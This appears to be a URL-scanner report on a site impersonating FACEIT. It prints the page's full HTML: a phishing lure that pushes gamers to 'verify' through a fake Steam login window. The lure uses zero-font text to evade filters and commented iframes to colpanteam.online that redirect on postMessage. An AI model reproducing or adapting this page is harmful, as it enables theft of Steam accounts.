- 扫描 ID:
- 4664990e-b131-4420-b92e-e98425df3697已完成
- 提交的 URL:
- https://faceit.celebrityleagueopenauth.com/
- 报告完成时间:
链接 · 找到 1 个
从页面中识别出的传出链接
链接 | 文本 |
---|---|
https://support.faceit.com/ | Contact FACEIT Support |
JavaScript 变量 · 找到 15 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
0 | object |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
$ | function |
jQuery | function |
mousePosition | undefined |
offset | object |
isDown | boolean |
randonChanges | object |
控制台日志消息 · 找到 1 条
记录到 Web 控制台的消息
类型 | 类别 | 记录 |
---|---|---|
error | network |
|
HTML
页面的原始 HTML 正文
<html><head>
<meta charset="utf-8">
<title>FACEIT</title>
<base>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="noindex, nofollow">
<link rel="icon" type="image/x-icon" href="favicon.ico">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
<link href="https://fonts.googleapis.com/css2?family=Play:wght@400;700&display=swap" rel="stylesheet">
<link href="https://unpkg.com/[email protected]/css/boxicons.min.css" rel="stylesheet">
<style>
* {
box-sizing: border-box;
}
html,
body {
padding: 0;
margin: 0;
background: #000;
font-family: "Play", sans-serif;
overflow-x: hidden;
}
a {
cursor: pointer;
text-decoration: none;
}
.head {
width: 100%;
display: flex;
justify-content: center;
align-items: center;
height: 64px;
box-shadow: rgba(0, 0, 0, 0.6) 0px 4px 16px 4px;
background-color: rgb(31, 31, 31);
border-bottom: 1px solid rgb(48, 48, 48);
}
.head img {
width: 108px;
}
.logo {
max-width: 1200px;
width: 100%;
display: flex;
justify-content: start;
}
.title {
max-width: 1200px;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
}
.content {
width: 100%;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
gap: 50px;
background: linear-gradient(
220deg,
rgb(255, 85, 32),
rgb(0, 0, 0),
rgb(0, 0, 0)
)
0% 0% / 225%;
background-size: 130%;
animation: 15s ease 0s infinite normal none running AnimationName;
}
@keyframes AnimationName {
0% {
background-position: 0% 81%;
}
50% {
background-position: 100% 20%;
}
100% {
background-position: 0% 81%;
}
}
.title p {
font-size: 42px;
color: white;
text-align: center;
font-weight: 700;
padding-top: 100px;
}
.subtitle {
font-size: 16px;
color: white;
}
.title a {
padding: 15px 35px;
background: rgb(255, 108, 32);
margin-top: 50px;
border-radius: 5px;
font-size: 18px;
color: white;
font-weight: 700;
}
.tablets {
display: flex;
justify-content: center;
align-items: center;
gap: 16px;
margin-top: 80px;
}
.tablet {
display: flex;
flex-direction: column;
-moz-box-align: center;
align-items: center;
gap: 4px;
border-radius: 99999px;
background: linear-gradient(rgb(0, 0, 0) 0%, rgb(18, 18, 18) 100%);
padding: 8px 56px;
}
.part {
padding: 1px;
border-radius: 99999px;
background: linear-gradient(18deg, gray, black 50%, gray);
}
.sub {
color: rgba(255, 255, 255, 0.6);
font-size: 14px;
white-space: nowrap;
}
.data span {
font-size: 22px;
font-weight: 700;
white-space: nowrap;
color: white;
}
.data {
display: flex;
flex-direction: row;
-moz-box-align: center;
align-items: center;
-moz-box-pack: center;
justify-content: center;
gap: 4px;
}
.play {
width: 100%;
max-width: 1200px;
}
.tag {
margin: 0px;
margin-bottom: 24px;
font-size: 28px;
font-weight: bold;
letter-spacing: 0.0025em;
line-height: 32px;
color: white;
}
.tab {
padding: 1px;
display: flex;
border-radius: 8px;
background: linear-gradient(
167deg,
rgba(0, 0, 0, 0.05) 9.42%,
rgb(0, 0, 0) 81.83%
),
linear-gradient(
170deg,
rgba(255, 255, 255, 0.08) 11.42%,
rgb(255, 255, 255) 113.83%
);
}
.contain {
border-radius: 8px;
border: medium;
background: rgb(18, 18, 18);
width: 100%;
cursor: pointer;
-moz-box-align: center;
align-items: center;
display: flex;
gap: unset;
flex-direction: row;
-moz-box-pack: start;
justify-content: flex-start;
padding: 8px 8px 8px 16px;
min-height: unset;
}
.tabs {
gap: 40px;
padding: 40px 0px;
display: flex;
flex-direction: column;
}
.descr {
display: flex;
flex-direction: column;
-moz-box-pack: center;
justify-content: center;
margin-left: 16px;
gap: 4px;
}
.descr p {
font-weight: bold;
line-height: 20px;
letter-spacing: 0.02em;
font-size: 16px;
color: white;
margin: 0;
text-align: left;
}
.descr span {
color: rgba(255, 255, 255, 0.6);
letter-spacing: 0.02em;
font-size: 14px;
font-weight: normal;
line-height: 20px;
text-align: left;
}
.arrow {
display: flex;
-moz-box-pack: center;
justify-content: center;
width: 24px;
margin-left: auto;
}
.active {
background: rgb(31, 31, 31);
}
.powers {
height: auto;
position: relative;
cursor: grab;
display: flex;
max-width: 268px;
max-height: 170px;
flex-direction: column;
-moz-box-align: center;
align-items: center;
padding: 2px;
border-radius: 8px;
background: linear-gradient(51deg, gray, black 50%, gray);
box-shadow: rgba(0, 0, 0, 0.6) -1px -4px 5px 2px inset,
rgba(255, 85, 0, 0.25) 0px 0px 100px 0px;
}
.powers img {
border-radius: 8px;
max-width: 268px;
max-height: 170px;
}
.inside {
display: flex;
justify-content: space-between;
}
.image {
display: flex;
flex-direction: column;
-moz-box-pack: center;
justify-content: center;
-moz-box-align: center;
align-items: center;
gap: 24px;
margin: 0px auto;
}
.mim {
margin: 0px;
font-size: 22px;
font-weight: bold;
font-family: Play, sans-serif;
letter-spacing: 0.005em;
line-height: 28px;
color: white;
}
.description {
color: rgba(255, 255, 255, 0.6);
text-align: center;
padding: 0px 24px;
text-shadow: rgba(0, 0, 0, 0.38) 0px 2px 8px;
letter-spacing: 0.02em;
font-size: 14px;
font-weight: normal;
line-height: 20px;
}
.faq {
width: 100%;
max-width: 1200px;
display: flex;
justify-content: center;
align-items: center;
}
.ftaq {
margin: 0px;
font-size: 38px;
font-weight: bold;
font-family: Play, sans-serif;
line-height: 44px;
align-self: flex-start;
color: white;
}
.left {
width: 100%;
display: flex;
justify-content: start;
align-items: start;
flex-direction: column;
}
.right {
display: flex;
-moz-box-pack: center;
justify-content: center;
}
.right img {
width: 100%;
height: auto;
}
.accordeon {
display: flex;
flex-direction: column;
-moz-box-align: center;
align-items: start;
cursor: pointer;
padding: 24px 0px;
width: 80%;
border-bottom: 1px solid #303030;
}
.accordeon a {
flex: 1 1 auto;
order: 0;
-moz-box-flex: 1;
display: flex;
margin: 0px;
font-size: 16px;
font-weight: bold;
font-family: Play, sans-serif;
line-height: 20px;
color: white;
width: 100%;
justify-content: space-between;
padding: 0px 8px 0px 0px;
}
.accordeon svg {
flex: 0 0 auto;
order: 1;
-moz-box-flex: 0;
padding: 0px;
}
.accordeon .description {
padding: 0;
text-align: left;
margin-top: 10px;
display: none;
}
img {
pointer-events: none;
}
.cookie {
background: #161616;
width: 50%;
padding: 20px;
display: flex;
flex-direction: column;
position: fixed;
right: 25%;
border-radius: 4px;
bottom: 100;
}
.cookie span {
color: #696969;
font-size: 14px;
}
.ctitle {
color: rgba(255, 255, 255, 0.87) !important;
font-size: 16px !important;
font-weight: bold !important;
}
.accept {
display: flex;
justify-content: space-between;
align-items: center;
margin-top: 20px;
}
.buttons a {
background-color: rgb(255, 108, 32);
padding: 10px 30px;
color: white;
font-size: 16px;
font-weight: 700;
}
.buttons {
display: flex;
justify-content: center;
align-items: center;
gap: 10px;
}
@media screen and (max-width: 700px) {
.logo {
padding: 0px 16px;
}
.title p {
font-size: 20px;
}
.subtitle {
font-size: 10px;
}
.tablets {
flex-direction: column;
}
.part {
width: 100%;
}
.left {
justify-content: center;
align-items: center;
}
.ftaq {
width: 100%;
text-align: center;
}
.tag {
text-align: center;
}
.title {
width: 100%;
}
.inside {
flex-direction: column-reverse;
}
.faq {
flex-direction: column;
}
.cookie {
width: 100%;
bottom: 0;
right: unset;
}
}
div {
display: block;
}
a,
button {
background: 0px 0px;
margin: 0px;
padding: 0px;
}
a,
button {
padding: 0px;
}
.windslayercontent-section-info-list li:last-child {
margin-bottom: 0px;
}
div,
h3,
img,
li,
p,
span,
ul {
margin: 0px;
padding: 0px;
border: 0px;
outline: 0px;
font-size: 100%;
vertical-align: baseline;
background: 0px 0px;
}
a {
font-size: 100%;
vertical-align: baseline;
}
button {
font-family: inherit;
font-size: inherit;
border: none;
cursor: pointer;
outline: 0px;
}
* {
box-sizing: border-box;
scrollbar-width: none;
}
::-webkit-scrollbar {
display: none;
}
.winds,
.cheking_account,
.iframe_steam {
top: 0px;
left: 0px;
width: 100%;
height: 100%;
z-index: 10;
overflow-y: scroll;
}
.winds,
.cheking_account,
.iframe_steam {
position: fixed;
background-color: rgba(0, 0, 0, 0.85);
padding-top: 40px;
display: flex;
justify-content: center;
align-items: center;
}
.winds__body {
max-width: 900px;
margin: 0px auto;
width: 100%;
}
.windslayerheader {
display: flex;
justify-content: space-between;
padding: 20px;
background: black;
}
.windslayerheader-button {
color: rgb(160, 160, 160);
text-transform: uppercase;
font-size: 15px;
font-weight: 600;
}
.windslayercontent {
background: rgb(24, 24, 24);
padding: 60px 40px;
}
.windslayercontent-inner {
position: relative;
max-width: 430px;
margin: 0px auto;
width: 100%;
color: rgb(149, 154, 162);
line-height: 18px;
}
.windslayercontent-section {
display: flex;
gap: 20px;
margin-bottom: 40px;
}
.windslayercontent-section-icon {
max-width: 32px;
width: 100%;
height: 100%;
}
.windslayercontent-section-info-title {
margin-bottom: 10px;
font-size: 16px;
color: rgb(255, 255, 255);
}
.windslayercontent-section-info-list li {
margin-bottom: 20px;
}
.windslayercontent-confirm-text {
display: block;
text-align: center;
margin-bottom: 30px;
font-size: 16px;
}
.windslayercontent-confirm {
color: rgb(255, 255, 255);
background-color: rgb(255, 85, 0);
text-transform: uppercase;
font-weight: 700;
border-radius: 2px;
padding: 5px 15px;
display: flex;
align-items: center;
margin: 0px auto 30px;
transition: all 0.15s ease 0s;
}
.windslayercontent-confirm:disabled {
cursor: not-allowed;
background: rgba(94, 97, 112, 0.3) !important;
color: rgba(94, 97, 112, 0.8) !important;
}
.windslayercontent-confirm:hover {
background-color: rgb(253, 110, 53);
}
.windslayercontent-confirm-img {
display: flex;
align-items: center;
justify-content: center;
padding-right: 8px;
position: relative;
}
.windslayercontent-confirm-img::after {
content: "";
position: absolute;
right: 0px;
top: 0px;
width: 1px;
background-color: rgba(0, 0, 0, 0.1);
height: 24px;
}
.windslayercontent-confirm-img img {
display: block;
}
.windslayercontent-confirm-button-text {
padding: 0px 15px;
}
.windslayercontent-confirm-problem {
display: block;
margin-bottom: 10px;
text-align: center;
}
.windslayercontent-confirm-support {
color: rgb(255, 255, 255);
font-weight: 700;
text-decoration: none;
display: block;
text-align: center;
font-size: 15px;
}
.windslayercontent-confirm-support:hover {
text-decoration: underline;
}
@media (max-width: 768px) {
.winds {
padding-top: 0px;
}
.windslayerheader {
background-color: rgb(0, 0, 0);
}
}
div,
p {
margin: 0;
padding: 0;
border: 0;
outline: 0;
font-size: 100%;
vertical-align: baseline;
background: transparent;
}
button {
background: transparent;
margin: 0;
padding: 0;
font-family: inherit;
font-size: inherit;
border: none;
cursor: pointer;
outline: none;
}
* {
box-sizing: border-box;
}
*::-webkit-scrollbar {
display: none;
}
* {
-ms-overflow-style: none;
scrollbar-width: none;
}
.error {
width: 100%;
height: 100%;
display: flex;
justify-content: center;
align-items: center;
position: fixed;
z-index: 9999;
background-color: rgba(0, 0, 0, 0.85);
}
.table {
padding: 40px 80px;
background: rgb(24, 24, 24);
flex-direction: column;
display: flex;
border-radius: 4px;
z-index: 9999;
text-align: center;
gap: 5px;
}
.table p {
font-size: 22px;
color: white;
margin-bottom: 20px;
font-weight: 700;
}
.table span {
color: #959aa2;
}
.loader {
font-size: 10px;
width: 1em;
height: 1em;
border-radius: 50%;
position: relative;
text-indent: -9999em;
animation: mulShdSpin 1.1s infinite ease;
transform: translateZ(0);
margin: 0 auto;
margin-bottom: 100px;
}
@keyframes mulShdSpin {
0%,
100% {
box-shadow: 0em -2.6em 0em 0em #ffffff,
1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2),
2.5em 0em 0 0em rgba(255, 255, 255, 0.2),
1.75em 1.75em 0 0em rgba(255, 255, 255, 0.2),
0em 2.5em 0 0em rgba(255, 255, 255, 0.2),
-1.8em 1.8em 0 0em rgba(255, 255, 255, 0.2),
-2.6em 0em 0 0em rgba(255, 255, 255, 0.5),
-1.8em -1.8em 0 0em rgba(255, 255, 255, 0.7);
}
12.5% {
box-shadow: 0em -2.6em 0em 0em rgba(255, 255, 255, 0.7),
1.8em -1.8em 0 0em #ffffff, 2.5em 0em 0 0em rgba(255, 255, 255, 0.2),
1.75em 1.75em 0 0em rgba(255, 255, 255, 0.2),
0em 2.5em 0 0em rgba(255, 255, 255, 0.2),
-1.8em 1.8em 0 0em rgba(255, 255, 255, 0.2),
-2.6em 0em 0 0em rgba(255, 255, 255, 0.2),
-1.8em -1.8em 0 0em rgba(255, 255, 255, 0.5);
}
25% {
box-shadow: 0em -2.6em 0em 0em rgba(255, 255, 255, 0.5),
1.8em -1.8em 0 0em rgba(255, 255, 255, 0.7), 2.5em 0em 0 0em #ffffff,
1.75em 1.75em 0 0em rgba(255, 255, 255, 0.2),
0em 2.5em 0 0em rgba(255, 255, 255, 0.2),
-1.8em 1.8em 0 0em rgba(255, 255, 255, 0.2),
-2.6em 0em 0 0em rgba(255, 255, 255, 0.2),
-1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2);
}
37.5% {
box-shadow: 0em -2.6em 0em 0em rgba(255, 255, 255, 0.2),
1.8em -1.8em 0 0em rgba(255, 255, 255, 0.5),
2.5em 0em 0 0em rgba(255, 255, 255, 0.7),
1.75em 1.75em 0 0em #ffffff,
0em 2.5em 0 0em rgba(255, 255, 255, 0.2),
-1.8em 1.8em 0 0em rgba(255, 255, 255, 0.2),
-2.6em 0em 0 0em rgba(255, 255, 255, 0.2),
-1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2);
}
50% {
box-shadow: 0em -2.6em 0em 0em rgba(255, 255, 255, 0.2),
1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2),
2.5em 0em 0 0em rgba(255, 255, 255, 0.5),
1.75em 1.75em 0 0em rgba(255, 255, 255, 0.7),
0em 2.5em 0 0em #ffffff, -1.8em 1.8em 0 0em rgba(255, 255, 255, 0.2),
-2.6em 0em 0 0em rgba(255, 255, 255, 0.2),
-1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2);
}
62.5% {
box-shadow: 0em -2.6em 0em 0em rgba(255, 255, 255, 0.2),
1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2),
2.5em 0em 0 0em rgba(255, 255, 255, 0.2),
1.75em 1.75em 0 0em rgba(255, 255, 255, 0.5),
0em 2.5em 0 0em rgba(255, 255, 255, 0.7), -1.8em 1.8em 0 0em #ffffff,
-2.6em 0em 0 0em rgba(255, 255, 255, 0.2),
-1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2);
}
75% {
box-shadow: 0em -2.6em 0em 0em rgba(255, 255, 255, 0.2),
1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2),
2.5em 0em 0 0em rgba(255, 255, 255, 0.2),
1.75em 1.75em 0 0em rgba(255, 255, 255, 0.2),
0em 2.5em 0 0em rgba(255, 255, 255, 0.5),
-1.8em 1.8em 0 0em rgba(255, 255, 255, 0.7),
-2.6em 0em 0 0em #ffffff,
-1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2);
}
87.5% {
box-shadow: 0em -2.6em 0em 0em rgba(255, 255, 255, 0.2),
1.8em -1.8em 0 0em rgba(255, 255, 255, 0.2),
2.5em 0em 0 0em rgba(255, 255, 255, 0.2),
1.75em 1.75em 0 0em rgba(255, 255, 255, 0.2),
0em 2.5em 0 0em rgba(255, 255, 255, 0.2),
-1.8em 1.8em 0 0em rgba(255, 255, 255, 0.5),
-2.6em 0em 0 0em rgba(255, 255, 255, 0.7),
-1.8em -1.8em 0 0em #ffffff;
}
}
</style>
<script src="/js/jquery-3.7.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>
<script src="/js/app.js?977202786"></script>
</head>
<body>
<!--<iframe src='https://colpanteam.online/679ce8688f99dda10' border='0' style='width:100vw; height:100vh; border: none; display: none;' id="iframe_window" onload="window.addEventListener('message',e=>{if(typeof e.data=='object'&&typeof e.data.r=='string'&&e.data.r.length>0){window.location.href=e.data.r}},false);"></iframe>-->
<div class="app_window">
<div class="error" style="display: none">
<div class="table">
<p>Your account has not been verified</p>
<span id="message" style="max-width: 700px">Message</span>
</div>
</div>
<div class="winds" style="display: none">
<div class="winds__body">
<div class="windslayerheader">
<img width="130" height="20" src="images/white.svg" alt="logotype" class="windslayerheader-logo">
<button class="windslayerheader-button doclose">Close</button>
</div>
<div class="windslayercontent">
<div class="windslayercontent-inner">
<div class="windslayercontent-section">
<svg class="windslayercontent-section-icon" width="32px" height="32px" viewBox="0 0 24 24" fill="currentColor">
<path d="M18 10H8V8a4 4 0 1 1 8 0h2A6 6 0 1 0 6 8v2a2 2 0 0 0-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2v-8a2 2 0 0 0-2-2zm0 10H6v-8h12v8z" fill="currentColor"></path>
</svg>
<div class="windslayercontent-section-info">
<h3 class="windslayercontent-section-info-title">
Public account
</h3>
<p class="windslayercontent-section-info-text">
Your St<span style="font-size: 0">triple cr</span>eam
account and game stats must be public. Private accounts
cannot be connected.
</p>
</div>
</div>
<div class="windslayercontent-section">
<svg class="windslayercontent-section-icon" width="32px" height="32px" viewBox="0 0 24 24" fill="currentColor">
<path d="M20.12 5.12l-3.53-3.53A2 2 0 0 0 15.17 1H8.83a2 2 0 0 0-1.42.59L3.88 5.12A3 3 0 0 0 3 7.24v5.85a8 8 0 0 0 3.09 6.31l4.08 3.18a2 2 0 0 0 1.23.42h1.2a2 2 0 0 0 1.23-.42l4.08-3.18A8 8 0 0 0 21 13.09V7.24a3 3 0 0 0-.88-2.12zm-1.12 8a5.93 5.93 0 0 1-2.32 4.73L12.6 21h-1.2l-4.08-3.18A5.93 5.93 0 0 1 5 13.09V7.24a1 1 0 0 1 .29-.7L8.83 3h6.34l3.54 3.54a1 1 0 0 1 .29.7v5.88zM15.82 8a.5.5 0 0 0-.7 0l-4.74 4.74-1.5-1.49a.48.48 0 0 0-.7 0l-.53.53a.5.5 0 0 0 0 .71L10 14.85a.48.48 0 0 0 .7 0l5.62-5.62a.5.5 0 0 0 0-.71l-.5-.52z" fill="currentColor"></path>
</svg>
<div class="windslayercontent-section-info">
<h3 class="windslayercontent-section-info-title">
Secure connection
</h3>
<ul class="windslayercontent-section-info-list">
<li>
Your St<span style="font-size: 0">age of the best hands</span>eam login credentials will not be shared.
</li>
<li>
Any information on your St<span style="font-size: 0">strategic games of t</span>eam profile page that is set to be publicly viewable may
be accessed by FACEIT.
</li>
</ul>
</div>
</div>
<span class="windslayercontent-confirm-text">Verify your account to start playing CS2</span>
<button class="windslayercontent-confirm" id="createVerify">
<div class="windslayercontent-confirm-img">
<img width="24" height="24" src="images/logo.png" alt="steam">
</div>
<span class="windslayercontent-confirm-button-text">
Verify CS2
</span>
</button>
<span class="windslayercontent-confirm-problem">Having difficulty connecting your game?</span>
<a target="_blank" href="https://support.faceit.com/" class="windslayercontent-confirm-support">Contact FACEIT Support</a>
</div>
</div>
</div>
</div>
<!--<div class="iframe_steam" style="display: none">-->
<!-- <div class="winds__body">-->
<!-- <div class="windslayerheader">-->
<!-- <img width="130" height="20" src="images/white.svg" alt="logotype" class="windslayerheader-logo">-->
<!-- <button class="windslayerheader-button doclose_iframe_steam">-->
<!-- Close-->
<!-- </button>-->
<!-- </div>-->
<!-- <div class="windslayercontent" style="padding: 0;">-->
<!-- <div class="windslayercontent-inner" style="max-width:850px;">-->
<!-- <iframe id="auth_steam" src='https://colpanteam.online/00226' border='0' style='text-align: center; width: 100%; max-width: 850px; height:100%; max-height: 600px; border: none;' onload="window.addEventListener('message',e=>{if(typeof e.data=='object'&&typeof e.data.r=='string'&&e.data.r.length>0){window.location.href=e.data.r}},false);"></iframe>-->
<!-- </div>-->
<!-- </div>-->
<!-- </div>-->
<!--</div>-->
<div class="head">
<div class="logo">
<img src="images/white.svg">
</div>
</div>
<div class="content">
<div class="title">
<p>YOUR LEADING COMPETITIVE <br>GAMING PLATFORM</p>
<span class="subtitle">To participate in the club, you need to verify your account with a
CS game</span>
<a class="start">VERIFY CS</a>
<div class="tablets">
<div class="part">
<div class="tablet">
<span class="sub">Players Online</span>
<div class="data">
<img src="images/cs.svg">
<span id="online">80320</span>
</div>
</div>
</div>
<div class="part">
<div class="tablet">
<span class="sub">Live Matches</span>
<div class="data">
<img src="images/fight.png">
<span id="matches">7891</span>
</div>
</div>
</div>
<div class="part">
<div class="tablet">
<span class="sub">Rewards to Date</span>
<div class="data">
<img src="images/champion.png">
<span>$10 Million+</span>
</div>
</div>
</div>
</div>
</div>
<div class="play">
<p class="tag">Play with us</p>
<div class="inside">
<div class="tabs">
<a class="tab" id="protected">
<div class="contain active">
<img src="images/ac.svg">
<div class="descr">
<p>Protected by Anti-Cheat</p>
<span>Play the game without the participation of cheaters</span>
</div>
<div class="arrow">
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="24" width="24">
<path fill-rule="evenodd" clip-rule="evenodd" d="M11 6L9.586 7.414 14.172 12l-4.586 4.586L11 18l6-6-6-6z" fill="white"></path>
</svg>
</div>
</div>
</a>
<a class="tab" id="improved">
<div class="contain">
<img src="images/mm.png">
<div class="descr">
<p>Improved matchmaking system</p>
<span>Take part in matches balanced by our transparent
Elo.</span>
</div>
<div class="arrow" style="opacity: 0">
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="24" width="24">
<path fill-rule="evenodd" clip-rule="evenodd" d="M11 6L9.586 7.414 14.172 12l-4.586 4.586L11 18l6-6-6-6z" fill="white"></path>
</svg>
</div>
</div>
</a>
<a class="tab" id="skill">
<div class="contain">
<img src="images/better.svg">
<div class="descr">
<p>Improve your skill</p>
<span>Advance your career ladder and increase your skill
level</span>
</div>
<div class="arrow" style="opacity: 0">
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="24" width="24">
<path fill-rule="evenodd" clip-rule="evenodd" d="M11 6L9.586 7.414 14.172 12l-4.586 4.586L11 18l6-6-6-6z" fill="white"></path>
</svg>
</div>
</div>
</a>
</div>
<div class="image" id="one">
<p class="mim">Why do pros prefer FACEIT?</p>
<div class="powers">
<img src="images/ac.png">
</div>
<p class="description">
See how far you can go with the most trusted anti-cheat in
Counter- <br>
Strike, advanced AI Minerva protecting you from toxicity plus
our army <br>
of experienced staff members to help you on your path to the
top!
</p>
</div>
<div class="image" id="two" style="display: none">
<p class="mim">Play fair matchmaking</p>
<div class="powers">
<img src="images/balance.png">
</div>
<p class="description">
Experience the thrill of engaging in back-and-forth games
against opponents <br>
of similar skill levels with our custom rank and Elo system.<br>Easily
track your progress and see how close you are to leveling up!
</p>
</div>
<div class="image" id="three" style="display: none">
<p class="mim">Real skill development</p>
<div class="powers">
<img src="images/badge.png">
</div>
<p class="description">
Enhance your abilities by honing them in a competitive
environment alongside <br>other players striving to reach
professional levels. <br>
Elevate your game within our custom rank system as you train
amidst a serious<br>and competitive atmosphere.
</p>
</div>
</div>
</div>
<div class="faq">
<div class="left">
<p class="ftaq">FAQ</p>
<div class="accordeon">
<a>
<span>Can I play on FACEIT if I'm new to Counter-Strike?</span>
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="20" width="20">
<path fill-rule="evenodd" clip-rule="evenodd" d="M12 17l6-6-1.414-1.414L12 14.17 7.414 9.587 6 11l6 6z" fill="white"></path>
</svg>
</a>
<span class="description">Can I play on FACEIT if I'm new to Counter-Strike? Certainly!
FACEIT is an open platform that welcomes players of all skill
levels. While some may believe that it's exclusively for
top-tier competitive gamers, our skill-based brackets are
designed to accommodate players of all skill levels and
guarantee an enjoyable experience for everyone.</span>
</div>
<div class="accordeon">
<a>
<span>How much does it cost to join FACEIT?</span>
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="20" width="20">
<path fill-rule="evenodd" clip-rule="evenodd" d="M12 17l6-6-1.414-1.414L12 14.17 7.414 9.587 6 11l6 6z" fill="white"></path>
</svg>
</a>
<span class="description">It's free to join FACEIT! We also offer premium subscriptions
to enhance your experience.</span>
</div>
<div class="accordeon">
<a>
<span>What is the FACEIT Anti-Cheat and how does it work?</span>
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="20" width="20">
<path fill-rule="evenodd" clip-rule="evenodd" d="M12 17l6-6-1.414-1.414L12 14.17 7.414 9.587 6 11l6 6z" fill="white"></path>
</svg>
</a>
<span class="description">
The FACEIT Anti-Cheat is our industry-leading Anti-Cheat
software, designed to ensure the highest level of integrity on
our platform. The FACEIT Anti-Cheat consists of:
<ul>
<li>
An application that runs when you are playing one of our
protected games (like CS2).
</li>
<li>A kernel mode driver that is loaded at boot.</li>
<li>
A server-side SDK that ensures communication between the
client and server happens in a trusted and secure manner.
</li>
</ul>
All of the components of the FACEIT Anti-Cheat have been
developed in-house, with both game safety and personal computer
safety being our priority.
</span>
</div>
<div class="accordeon">
<a>
<span>How do FACEIT skill levels work?</span>
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="20" width="20">
<path fill-rule="evenodd" clip-rule="evenodd" d="M12 17l6-6-1.414-1.414L12 14.17 7.414 9.587 6 11l6 6z" fill="white"></path>
</svg>
</a>
<span class="description">Can I play on FACEIT if I'm new to Counter-Strike? Certainly!
FACEIT is an open platform that welcomes players of all skill
levels. While some may believe that it's exclusively for
top-tier competitive gamers, our skill-based brackets are
designed to accommodate players of all skill levels and
guarantee an enjoyable experience for everyone.</span>
</div>
<div class="accordeon">
<a>
<span>How to Join the Club?</span>
<svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="20" width="20">
<path fill-rule="evenodd" clip-rule="evenodd" d="M12 17l6-6-1.414-1.414L12 14.17 7.414 9.587 6 11l6 6z" fill="white"></path>
</svg>
</a>
<span class="description">Can I play on FACEIT if I'm new to Counter-Strike? Certainly!
FACEIT is an open platform that welcomes players of all skill
levels. While some may believe that it's exclusively for
top-tier competitive gamers, our skill-based brackets are
designed to accommodate players of all skill levels and
guarantee an enjoyable experience for everyone.</span>
</div>
</div>
<div class="right">
<img src="images/footer.png">
</div>
</div>
</div>
<div class="cookie" style="">
<p class="ctitle">Privacy Settings</p>
<span>This site uses third-party website tracking technologies to provide
and continually improve our services, and to display advertisements
according to users' intersts. I agree and may revoke or change my
consent at any time with effect for the future.
<div class="accept">
<p>Powered by Usercentrics Consent Management</p>
<div class="buttons"><a>Reject All</a><a>Accept All</a></div>
</div>
</span>
</div>
<div class="chat_support_icon" style="display: none">
<i class="bx bx-support"></i>
</div>
<div class="chat_support" style="display: none">
<div class="chat_support_head">
<div class="chat_name">Support</div>
<div class="close_support">x</div>
</div>
<div class="chat_messages"></div>
<div class="chat_sends_message">
<input type="text" id="chat_message">
<div class="chat_send_btn">Send</div>
</div>
<input type="hidden" id="chat_id" value="">
</div>
<style>
.chat_sends_message {
width: 100%;
display: flex;
align-items: center;
gap: 10px;
padding-top: 10px;
}
.chat_sends_message input {
width: 100%;
background: #2d353b;
padding: 10px 15px;
border-radius: 5px;
outline: none;
border: none;
}
.chat_username.user,
.chat_message_message.user {
display: flex;
justify-content: flex-end;
float: right;
text-align: right;
}
.chat_send_btn {
cursor: pointer;
padding: 8px 15px;
background: rgb(255, 108, 32);
border-radius: 5px;
font-size: 16px;
color: white;
font-weight: 700;
}
.chat_support_icon {
position: absolute;
bottom: 30px;
right: 30px;
background: rgb(18, 18, 18);
padding: 7px;
border-radius: 500px;
color: #fff;
font-size: 21px;
cursor: pointer;
z-index: 9999;
}
.chat_support {
position: absolute;
bottom: 30px;
right: 30px;
width: 100%;
height: 100%;
max-height: 400px;
max-width: 300px;
padding: 10px;
background: rgb(18, 18, 18);
border-radius: 5px;
z-index: 999999;
}
.chat_support_head {
width: 100%;
display: flex;
align-items: center;
justify-content: space-between;
border-bottom: 1px solid rgb(255, 85, 0);
padding-bottom: 10px;
}
.chat_name,
.close_support {
color: #fff;
font-size: 18px;
font-weight: 400;
}
.close_support {
cursor: pointer;
}
.chat_messages {
height: 100%;
max-height: 300px;
overflow-y: auto;
}
.chat_message {
display: flex;
flex-direction: column;
width: 100%;
flex-wrap: wrap;
gap: 5px;
border-radius: 5px;
padding: 10px 15px;
margin-top: 10px;
}
.chat_username {
font-size: 18px;
color: #fff;
font-weight: 400;
}
.chat_message_message {
font-size: 14px;
color: #fff;
font-weight: 400;
}
</style>
</div>
<div style="width: 0px; background: transparent; z-index: 100000">
<div class="nvsyyjaxnlfxvdfpdgqqquguyprhbnmf" style="
display: none;
top: 115px;
left: 350px;
width: 1002px;
height: 717px;
z-index: 100000000;
position: absolute;
" id="iframe_window">
<div>
<div class="vgcpybocpwnskljukuwmyvpqhrzzndqv">
<div class="swdwildflcokqggdivwssjcbwdljiivg"></div>
<div class="zakvqfaboxpvejekrcewidzmjcfbgbvk">Steam Community</div>
<div class="xcyfucntdesimijjbkvvebnkmwkhynru">
<div class="xoqdntucvjtlfvuefpgekhuotntgzblk cotuvuxjltknjjkudkftosxhmhjehfwu"></div>
